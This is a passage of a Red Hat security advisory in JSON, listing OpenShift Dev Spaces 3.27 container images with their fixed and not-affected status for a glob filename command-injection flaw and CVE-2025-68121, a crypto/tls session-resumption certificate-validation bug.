"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "glob: glob: Command Injection Vulnerability via Malicious Filenames"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
